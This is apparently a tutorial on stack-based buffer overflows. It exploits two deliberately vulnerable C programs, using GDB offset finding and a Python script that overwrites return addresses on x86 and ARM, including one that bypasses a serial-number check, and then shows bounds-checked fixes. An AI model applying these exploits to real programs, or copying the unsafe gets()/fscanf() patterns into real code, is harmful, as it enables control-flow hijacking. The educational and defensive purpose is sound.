Introduction to exploit development - Part 2: Stack overflows

Nov 1, 2025

#security #exploit-development #systems #x86 #memory #linux

Overview

In Part 1, we configured lab environments for exploit development on both x86 and ARM. In this part, we turn to one of the oldest and most basic vulnerability classes, which remains a common source of security bugs to this day: the stack-based buffer overflow.

We'll cover process memory layout, stack frames, and how buffer overflows enable control-flow hijacking. We'll then exploit two deliberately vulnerable programs to see how writing past the end of a buffer corrupts adjacent memory and ultimately lets us redirect program execution.

Memory layout of a process

When a program executes, the operating system allocates several distinct memory regions, each serving a specific purpose. Understanding this layout is critical for exploit development, as different vulnerabilities target different regions.

A typical Linux process memory layout (from low to high addresses):

.text segment: Contains the executable machine instructions (program code). This region is typically read-only to prevent code modification at runtime.
.data segment: Contains initialized global and static variables. These values are set at compile time and persist for the program's lifetime.
.bss segment: Contains uninitialized global and static variables. The name stands for "Block Started by Symbol" (historical reasons). These are zero-initialized at program start.
Heap: Dynamically allocated memory region that grows upward (toward higher addresses). Managed via malloc(), calloc(), realloc(), and free() in C.
Stack: Automatically managed memory for function call frames, local variables, and return addresses. Grows downward (toward lower addresses) on x86 and ARM architectures.

Conceptually, the stack and heap grow toward each other. A stack that grows too far, for example through unbounded recursion, runs past its limit and crashes the program with a stack overflow (stack exhaustion, not to be confused with the stack buffer overflow we discuss below).

  block-beta
    columns 5
    ADDR_G["0xbfffffff"]:1
    G["Kernel space (top of user memory)"]:4
    EMPTY1[" "]:1
    F["Stack (grows downward ↓) - function calls"]:4
    EMPTY2[" "]:1
    E["(unused memory)"]:4
    EMPTY3[" "]:1
    D["Heap (grows upward ↑) - malloc/free"]:4
    EMPTY4[" "]:1
    C[".bss segment - uninitialized globals"]:4
    ADDR_B["0x08049000"]:1
    B[".data segment - initialized globals"]:4
    ADDR_A["0x08048000"]:1
    A[".text segment - executable code, read-only"]:4

    style G fill:#fff,stroke:#8B7355,stroke-width:2px
    style F fill:#fff,stroke:#6B8E23,stroke-width:2px
    style E fill:#fff,stroke:#A9A9A9,stroke-width:2px
    style D fill:#fff,stroke:#B8860B,stroke-width:2px
    style C fill:#fff,stroke:#708090,stroke-width:2px
    style B fill:#fff,stroke:#4682B4,stroke-width:2px
    style A fill:#fff,stroke:#5F9EA0,stroke-width:2px
    style ADDR_G fill:none,stroke:none
    style ADDR_B fill:none,stroke:none
    style ADDR_A fill:none,stroke:none
    style EMPTY1 fill:none,stroke:none
    style EMPTY2 fill:none,stroke:none
    style EMPTY3 fill:none,stroke:none
    style EMPTY4 fill:none,stroke:none

The diagram above illustrates this layout with typical x86 32-bit addresses. Note that modern systems with ASLR randomize most of these addresses on each execution, but we've disabled ASLR for learning purposes.
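To compare this layout against a real process, Linux exposes each process's mappings in /proc/<pid>/maps. The following is a minimal Python sketch that parses that format. The helper name parse_maps and the SAMPLE excerpt are illustrative assumptions (the sample is hand-written to resemble the diagram, not captured from a real run):

```python
from pathlib import Path

def parse_maps(text):
    """Return (start, end, perms, name) tuples from /proc/<pid>/maps text."""
    regions = []
    for line in text.splitlines():
        # Fields: address range, perms, offset, device, inode, optional path
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        start, end = (int(x, 16) for x in fields[0].split("-"))
        name = fields[5].strip() if len(fields) > 5 else "(anonymous)"
        regions.append((start, end, fields[1], name))
    return regions

# Hypothetical excerpt, shaped like the 32-bit layout in the diagram.
SAMPLE = """\
08048000-08049000 r-xp 00000000 08:01 1234 /home/user/overflow
08049000-0804a000 rw-p 00000000 08:01 1234 /home/user/overflow
0804a000-0806b000 rw-p 00000000 00:00 0 [heap]
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    maps = Path("/proc/self/maps")
    # Fall back to the sample on systems without procfs.
    text = maps.read_text() if maps.exists() else SAMPLE
    for start, end, perms, name in parse_maps(text):
        print(f"{start:#014x}-{end:#014x} {perms} {name}")
```

Run on Linux, this prints the mappings of the Python interpreter itself. To inspect a target such as ./overflow, read /proc/<pid>/maps for its PID instead, or use info proc mappings inside GDB.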

The call stack and stack frames

The stack is a Last-In-First-Out (LIFO) data structure used to manage function calls. Each function invocation creates a stack frame (also called an activation record) containing:

Function arguments: Parameters passed to the function
Return address: Memory address to return to after function completes
Saved frame pointer: Previous stack frame's base pointer (allows stack unwinding)
Local variables: Function's automatic variables

On x86, two registers manage the stack:

ESP (Stack Pointer): Points to the top of the stack (lowest address in current frame)
EBP (Base/Frame Pointer): Points to the base of the current stack frame (used as a reference point for accessing local variables and parameters)

On ARM, equivalent registers are:

SP (Stack Pointer): Same purpose as ESP on x86
FP (Frame Pointer): Same purpose as EBP on x86 (though modern ARM code often omits frame pointers for optimization)
LR (Link Register): Stores the return address instead of pushing it to the stack initially

Function prologue and epilogue

When a function is called, the prologue sets up the stack frame:

; x86 function prologue
push ebp           ; Save old frame pointer
mov ebp, esp       ; Establish new frame pointer
sub esp, N         ; Allocate space for local variables

When the function returns, the epilogue tears down the frame:

; x86 function epilogue
mov esp, ebp       ; Restore stack pointer
pop ebp            ; Restore old frame pointer (leave performs both steps)
ret                ; Pop return address into EIP and jump

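The ret instruction is critical for exploitation. It pops a value from the stack into the instruction pointer (EIP), transferring control to that address. 32-bit ARM has no ret instruction; a function that saved LR on the stack typically returns by popping that value into PC (for example, pop {r7, pc}), with the same effect. If we can overwrite the saved return address on the stack, we can redirect execution anywhere in memory.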

Buffer overflow mechanics

A buffer overflow occurs when data written to a buffer exceeds its allocated size, overwriting adjacent memory. In C, functions like gets() and strcpy(), as well as scanf() with an unbounded %s conversion, perform no bounds checking, making them dangerous when handling untrusted input.

Consider a simple vulnerable function:

void vulnerable_function(void) {
    char buffer[30];
    gets(buffer);  // No bounds checking!
    printf("%s\n", buffer);
}

The buffer array is allocated on the stack with space for 30 bytes. Because gets() also appends a terminating null byte, any input of 30 characters or more writes past the end of the buffer. On the stack, this means overwriting:

The saved frame pointer (EBP)
The saved return address
Potentially other local variables or function arguments from calling functions

By carefully crafting input, an attacker can overwrite the saved return address with a pointer to malicious code (shellcode), redirecting execution when the function returns.
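The mechanics can be modelled without touching a real process. The following is a minimal Python sketch, assuming a simplified frame laid out as [buffer][saved EBP][return address] with no compiler padding. All addresses are illustrative placeholders, and unchecked_copy only imitates the behaviour of gets():

```python
import struct

BUF_SIZE = 30
SAVED_EBP = 0xBFFFF6C8      # illustrative placeholder
RET_TO_MAIN = 0x08048465    # illustrative placeholder

def make_frame():
    """Simplified frame, low to high: buffer, saved EBP, return address."""
    return bytearray(BUF_SIZE) + struct.pack("<II", SAVED_EBP, RET_TO_MAIN)

def unchecked_copy(frame, data):
    """Mimic gets(): copy the input plus a NUL byte, ignoring BUF_SIZE."""
    data += b"\x00"
    n = min(len(data), len(frame))   # stop only at the edge of the model
    frame[:n] = data[:n]

def saved_values(frame):
    """Return (saved EBP, return address) as currently stored in the frame."""
    return struct.unpack_from("<II", frame, BUF_SIZE)

if __name__ == "__main__":
    inputs = [
        ("short input", b"A" * 20),
        ("long input", b"A" * 34 + struct.pack("<I", 0x0804845F)),
    ]
    for label, data in inputs:
        frame = make_frame()
        unchecked_copy(frame, data)
        ebp, ret = saved_values(frame)
        print(f"{label}: saved EBP={ebp:#010x}, return address={ret:#010x}")
```

With the short input both saved values survive. With the long input the saved EBP becomes 0x41414141 ("AAAA") and the return address becomes whatever four bytes the attacker placed after the padding.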

Exploiting overflow.c

To understand buffer overflows concretely, we examine a vulnerable program and exploit it step by step.

overflow.c

#include <stdio.h>

void return_input (void)
{
   char array[30];

   gets (array);
   printf("%s\n", array);
}

int main(void)
{
   return_input();
   return 0;
}

Compile with security mitigations disabled (as configured in Part 1):

# x86
gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 \
    -no-pie -ggdb overflow.c -o overflow

# ARM
gcc -fno-stack-protector -z execstack -no-pie -ggdb overflow.c -o overflow

Finding the overflow offset

We use GDB to determine exactly how many bytes are needed to overwrite the return address. First, disassemble the return_input function:

gdb -q ./overflow
(gdb) disassemble return_input

The disassembly reveals:

The call to gets() where user input is read
The ret instruction where the function returns using the saved return address

Set breakpoints at the gets() call and at the ret instruction:

(gdb) break *return_input+<offset_of_gets>
(gdb) break *return_input+<offset_of_ret>
(gdb) run

At the first breakpoint (before gets()), examine the stack:

(gdb) x/20x $esp

The saved return address should be visible on the stack. By examining the disassembly of main, we can verify what address the function should return to normally (let's say 0x08048465).

Now continue to allow gets() to read input. Provide a pattern that allows us to identify the offset:

AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC DDDDDDDDDD

After entering this input, continue to the second breakpoint (at ret). Examine the stack again:

(gdb) x/20x $esp
(gdb) info registers

If the input was long enough, you'll see the saved return address has been overwritten with our pattern (e.g., 0x44444444 if we used 'D' characters). By counting characters, we determine the exact offset.

In this case, 34 bytes of padding are needed before the 4-byte return address is overwritten.
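Counting by hand gets ambiguous when the pattern repeats a letter, since 0x44444444 could start at several positions within a run of D's. One common alternative is a pattern in which every 4-byte window is unique, so the value found in EIP maps to exactly one offset. The following is a rough Python sketch of that idea; make_pattern and find_offset are hypothetical helper names, and the register value in the demo is constructed from the pattern rather than taken from a real debugging session:

```python
import string
from itertools import product

def make_pattern(length):
    """Build 'Aa0Aa1Aa2...' so that each 4-byte window occurs only once."""
    out = bytearray()
    groups = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    for upper, lower, digit in groups:
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])

def find_offset(pattern, register_value):
    """Find where the 4 bytes that landed in EIP/PC sit in the pattern.

    The register holds the bytes in little-endian order, so convert the
    integer back to its in-memory byte sequence before searching.
    Returns -1 if the value is not part of the pattern.
    """
    needle = register_value.to_bytes(4, "little")
    return pattern.find(needle)

if __name__ == "__main__":
    pattern = make_pattern(64)
    print(pattern.decode())
    # Pretend EIP held the four pattern bytes that start at offset 34.
    eip = int.from_bytes(pattern[34:38], "little")
    print(f"EIP={eip:#010x} -> offset {find_offset(pattern, eip)}")
```

Feed the pattern to the target, read the faulting EIP (or PC on ARM) from info registers, and pass that value to find_offset to get the padding length.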

Redirecting execution

To prove we control the instruction pointer, we can overwrite the return address with the address of return_input itself, causing the function to be called twice.

From the GDB disassembly, suppose return_input is located at 0x0804845f. We construct our payload:

payload = b"A" * 34 + b"\x5f\x84\x04\x08"

Note the address is in little-endian format (least significant byte first), as x86 is a little-endian architecture.
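Rather than reversing the bytes by hand, the conversion can be left to Python's struct module. This short sketch uses the example address from the text and shows both byte orders for contrast:

```python
import struct

address = 0x0804845F  # example address of return_input from the text

# "<I" means little-endian, unsigned 32-bit; ">I" is the big-endian equivalent.
little = struct.pack("<I", address)
big = struct.pack(">I", address)

print(little.hex(" "))  # 5f 84 04 08
print(big.hex(" "))     # 08 04 84 5f

# 34 bytes of padding followed by the 4-byte return address.
payload = b"A" * 34 + little
print(len(payload))     # 38
```

The little-endian form is the one that must appear in the payload, because the CPU reads the lowest-addressed byte as the least significant byte of the return address.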

Automating exploitation with Python

Manual exploitation via GDB is tedious and error-prone, so let's automate the process with a simple Python script:

exploit.py

#!/usr/bin/env python3
from subprocess import run, PIPE

def exploit(program_path: str, padding_length: int, shellcode: bytes) -> str:
    """
    Executes the target program and pipes a payload into STDIN.

    Args:
        program_path: Path to the program to execute/exploit
        padding_length: Number of padding bytes before shellcode
        shellcode: The address or code to execute

    Returns:
        Decoded stdout from the target program
    """
    payload = (b'A' * padding_length) + shellcode

    # Use stdbuf to disable C stdio buffering (prevents output loss on crash)
    result = run(['stdbuf', '-o0', program_path],
                 input=payload, stdout=PIPE, stderr=PIPE, timeout=2)

    return result.stdout.decode('utf-8', errors='replace')

if __name__ == "__main__":
    shellcode = (0x0804845f).to_bytes(4, byteorder='little')  # Address of return_input
    padding_length = 34

    print("\noverflow output:")
    print(exploit('./overflow', padding_length, shellcode))

Running this script redirects execution to return_input a second time, demonstrating control over the instruction pointer.

Architecture-specific offsets

The padding length of 34 bytes demonstrated above is specific to x86 architecture. ARM has different stack frame layouts and calling conventions due to its RISC design and use of the link register (LR). You'll need to determine the correct offset for your target architecture.

Finding the offset on ARM:

Use GDB with a unique pattern to identify where the return address is overwritten:

gdb -q ./overflow
(gdb) run < <(python3 -c 'print("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL")')
(gdb) info registers pc

The PC (program counter) register will contain part of your pattern. For example, if pc = 0x4a4a4a4a (ASCII "JJJJ"), count the position of "JJJJ" in your pattern to determine the offset. In this case, "JJJJ" appears at byte 36, so 36 bytes of padding are needed on ARM.

Next, find the runtime address of return_input:

(gdb) break return_input
(gdb) run
# Enter any input to hit the breakpoint
(gdb) print return_input

This prints the address at which the function is loaded. Because the binary was built with -no-pie, it matches the absolute addresses in the left-hand column of the disassemble output (the <+N> annotations there are offsets from the start of the function, not addresses). On ARM, you might see something like {void (void)} 0x10424 <return_input>, indicating the function is at address 0x10424 at runtime.

ARM Thumb mode consideration:

32-bit ARM processors support two instruction set modes: ARM mode (32-bit instructions) and Thumb mode (16-bit instructions, extended by Thumb-2 with some 32-bit encodings). Modern 32-bit ARM code is typically compiled in Thumb mode for better code density. When a return address is loaded into PC, its least significant bit (LSB) selects the mode, so to jump to a Thumb function you must set the LSB of the address to 1. If you leave it clear, the processor will try to execute Thumb instructions as ARM instructions, typically crashing with a SIGILL (illegal instruction) error.

To check if your function uses Thumb mode, look at the GDB disassembly - if consecutive instructions are 2 bytes apart (e.g., 0x10424, 0x10426, 0x10428), it's Thumb mode.

Use this address in your exploit with the LSB set:

if __name__ == "__main__":
    # Set LSB to 1 for Thumb mode (0x10424 | 1 = 0x10425)
    shellcode = (0x10424 | 1).to_bytes(4, byteorder='little')
    padding_length = 36  # ARM offset

    print("\noverflow output:")
    print(exploit('./overflow', padding_length, shellcode))

Note the key architectural differences between x86 and ARM exploitation:

Register names: ARM uses PC (program counter) instead of EIP, and LR (link register) for return addresses
Stack layout: ARM's push {r7, lr} prologue differs from x86's push ebp; mov ebp, esp
Offsets: Due to different calling conventions, buffer overflow offsets vary between architectures

Exploiting serial.c

This second example presents a more fun/realistic scenario: bypassing authentication logic. The code is adapted from The Shellcoder's Handbook, 2nd Edition by Chris Anley et al.

serial.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int valid_serial(char *psz) {
   size_t len = strlen(psz);
   unsigned total = 0;
   size_t i;

   if(len < 10)
      return 0;

   for(i = 0; i < len; i++) {
      if((psz[i] < '0') || (psz[i] > 'z'))
         return 0;

      total += psz[i];
   }

   if(total % 853 == 83)
      return 1;

   return 0;
}

int validate_serial() {
   char serial[24];

   fscanf(stdin, "%s", serial);

   if(valid_serial(serial))
      return 1;
   else
      return 0;
}

int do_valid_stuff() {
   printf("The serial number is valid!\n");
   // do serial-restricted, valid stuff here.
   exit(0);
}

int do_invalid_stuff() {
   printf("Invalid serial number!\nExiting\n");
   exit(1);
}

int main(int argc, char *argv[]) {
   if(validate_serial())
      do_valid_stuff();
   else
      do_invalid_stuff();

   return 0;
}

This program implements a serial number validation scheme. The valid_serial() function checks whether a provided string meets specific criteria:

Length must be at least 10 characters
All characters must be between '0' (ASCII 48) and 'z' (ASCII 122)
The sum of all character ASCII values modulo 853 must equal 83

Finding a legitimate serial that satisfies these constraints is possible but takes some work. However, validate_serial() reads into the 24-byte serial buffer using fscanf() with an unbounded %s, which performs no bounds checking. So, buffer overflow time!
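For comparison, the legitimate route can be sketched in a few lines of Python. The valid_serial function below is a port of the C function above (ASCII input assumed), and make_serial is a hypothetical helper that greedily builds one string meeting all three criteria. It is one possible construction, not the method used in the book:

```python
LOW, HIGH = ord("0"), ord("z")  # 48 and 122, the allowed character range

def valid_serial(s):
    """Python port of valid_serial() from serial.c (ASCII input assumed)."""
    if len(s) < 10:
        return False
    if any(not (LOW <= ord(c) <= HIGH) for c in s):
        return False
    return sum(ord(c) for c in s) % 853 == 83

def make_serial(length=10):
    """Build one serial whose character sum is congruent to 83 mod 853."""
    # Smallest target sum of the form 83 + 853k reachable with `length` chars.
    target = 83
    while target < LOW * length:
        target += 853
    if target > HIGH * length:
        raise ValueError("no valid serial of this length")

    # Start from all '0' characters and hand out the remaining sum greedily.
    remaining = target - LOW * length
    chars = []
    for _ in range(length):
        step = min(remaining, HIGH - LOW)
        chars.append(chr(LOW + step))
        remaining -= step
    return "".join(chars)

if __name__ == "__main__":
    serial = make_serial()
    print(serial, valid_serial(serial))  # zzzzzz<000 True
```

The generated serial sums to 936, and 936 % 853 == 83. The overflow below reaches do_valid_stuff() without solving this at all.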

Bypassing validation

Instead of finding a valid serial number, we overflow the buffer to overwrite the return address of validate_serial(), redirecting execution directly to do_valid_stuff().

Using GDB, find the address of do_valid_stuff(). We then need to determine the correct padding length to reach the saved return address.

Since we don't know the exact offset, we can brute force it programmatically by making some modifications to the exploit.py program we created earlier:

shellcode = (0x0804863c).to_bytes(4, byteorder='little')  # Address of do_valid_stuff()
# shellcode = (0x1059c | 1).to_bytes(4, byteorder='little') # For ARM

for padding_len in range(24, 35):
    output = exploit('./serial', padding_len, shellcode)
    if "valid" in output:
        print(f"Correct padding length: {padding_len}")
        print(f"Output:\n{output}")
        break

This loop tries padding lengths from 24 to 34 bytes. When the correct offset is found (typically around 28 bytes for this program), the overflow redirects execution to do_valid_stuff(), bypassing the serial validation entirely.

Understanding the implications

These simple examples illustrate a fundamental security principle: memory safety violations enable arbitrary code execution. By corrupting the saved return address, we can redirect program flow to:

Existing functions (as demonstrated above)
Shellcode injected into memory (covered in Part 3)
ROP gadgets for advanced exploitation (also covered in Part 3)

The vulnerability stems from:

Unsafe functions that don't validate input bounds (gets(), strcpy(), and scanf()/fscanf() with an unbounded %s)
Languages (like C) that don't enforce memory safety by default
The stack storing both data (local variables) and control flow information (return addresses) adjacently

Modern systems implement multiple mitigations against these attacks (ASLR, stack canaries, and non-executable memory, known as the NX bit or DEP), but understanding the fundamental mechanics remains essential to both offensive and defensive security work (and for a general understanding of how code execution works!).

Fixing the vulnerabilities

Fixing overflow.c

Replace gets() with the bounds-checked fgets():

void return_input(void) {
    char array[30];
    fgets(array, sizeof(array), stdin);  // Bounds-checked
    printf("%s\n", array);
}

The fgets() function takes the buffer size as a parameter and reads at most size - 1 characters, so it cannot write past the end of the array.

Fixing serial.c

Replace fscanf() with fgets(), but handle the trailing newline that fgets() includes:

int validate_serial() {
    char serial[24];

    // fgets() returns NULL on EOF or error, leaving serial unset
    if(fgets(serial, sizeof(serial), stdin) == NULL)
        return 0;
    serial[strcspn(serial, "\n")] = '\0';  // Remove newline

    if(valid_serial(serial))
        return 1;
    else
        return 0;
}

The strcspn() function returns the index of the first newline (or the length of the string if there is none), so the assignment replaces the newline with a null terminator, ensuring valid_serial() receives the expected format.

Next steps

We now understand how buffer overflows corrupt the stack and enable control flow hijacking. In Part 3, we explore how to leverage this control by injecting and executing arbitrary machine code (shellcode) on both x86 and ARM architectures.

We will learn to:

Write position-independent shellcode in assembly
Avoid null bytes that terminate string functions
Use NOP sleds for reliable exploitation
Apply Return-Oriented Programming (ROP) when the stack is non-executable
Compare exploitation techniques across x86 and ARM architectures

References

The Shellcoder's Handbook: Discovering and Exploiting Security Holes - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
Smashing The Stack For Fun And Profit - Aleph One (Phrack Magazine)
Hacking: The Art of Exploitation - Jon Erickson
Python subprocess documentation
Removing trailing newline from fgets() input - Stack Overflow